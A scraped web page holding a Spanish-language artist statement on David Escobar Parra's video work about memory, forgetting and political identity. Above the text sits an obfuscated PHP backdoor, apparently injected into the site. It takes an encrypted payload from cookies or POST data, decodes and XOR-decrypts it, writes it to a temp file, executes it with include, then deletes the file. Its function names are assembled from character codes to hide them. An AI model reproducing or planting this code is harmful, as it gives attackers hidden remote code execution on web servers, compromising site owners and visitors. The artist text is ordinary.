$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> David Escobar Parra – www.interferencechannel.com

David Escobar Parra

OSA

Las representaciones simbólicas de la memoria y del olvido, partiendo de múltiples contextos históricos y culturales, son el hilo conductor del trabajo de David Escobar. En los múltiples videos de este artista siempre se puede ver, de una u otra forma, el encadenamiento y la representación de los recuerdos como significantes y soportes de la memoria en la construcción de la identidad política individual y colectiva. Las brechas y pérdidas de la memoria, en tanto creadoras de nuevos recuerdos, así como las trazas psicológicas a la hora de la edición y el montaje de imágenes, son parte fundamental en su obra. No en vano las investigaciones de este artista están siempre enfocadas en los agentes amnésicos que activan la imaginación y la fabulación. A David le interesa la rememoración histórica, el mito político y la consciencia colectiva como relatos que, desde los medios plásticos, se pueden transformar para crear nuevas realidades, nuevos mundos, partiendo de imágenes e historias ya construidas. Su trabajo es una búsqueda por hallar espacios que no pueden ser reconstruidos por un simple recuerdo, entendiendo esto como cadenas significantes de archivos provisionales que se pueden codificar, recuperar y almacenar. Recrear estos acontecimientos de la vida de manera simbólica, para crear nuevas impresiones del mundo exterior desde los sentidos, es el objetivo principal de su investigación.♦

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